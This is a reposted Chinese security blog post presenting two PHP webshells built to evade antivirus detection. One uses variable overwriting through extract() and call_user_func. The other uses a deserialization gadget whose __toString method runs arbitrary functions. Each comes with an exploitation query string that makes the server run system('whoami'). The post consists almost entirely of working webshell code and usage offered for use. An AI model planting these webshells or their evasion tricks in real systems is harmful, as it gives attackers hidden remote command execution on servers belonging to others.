超级耐用Webshell免杀思路

admin 2023年6月5日22:44:43评论10 views字数 680阅读2分16秒阅读模式

变量覆盖型:

<?phpif($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($_REQUEST);});}

利用:

exec=1&a=system&b=whoami

反序列化型:

<?phpclass test{public $id = array('a'=>'1','b'=>'2');function __wakeup(){echo $this;}
function __toString(){call_user_func(function() {$cmd = function($params){extract($params);$a($b);};$cmd($this->id);});}};if($_GET['exec']==="0"){exit;}else if($_GET['exec']==="1"){$test1 = $_GET['string'];$test2 = unserialize($test1);}

利用:

exec=1&string=O:4:"test":1:{s:2:"id";a:2:{s:1:"a";s:6:"system";s:1:"b";s:6:"whoami";}}


可参考:

https://mp.weixin.qq.com/s/WQaSVZQ_jeH9RiTvRwd16A

原文始发于微信公众号(浪飒sec):超级耐用Webshell免杀思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日22:44:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   超级耐用Webshell免杀思路http://cn-sec.com/archives/1707825.html

发表评论

匿名网友 填写信息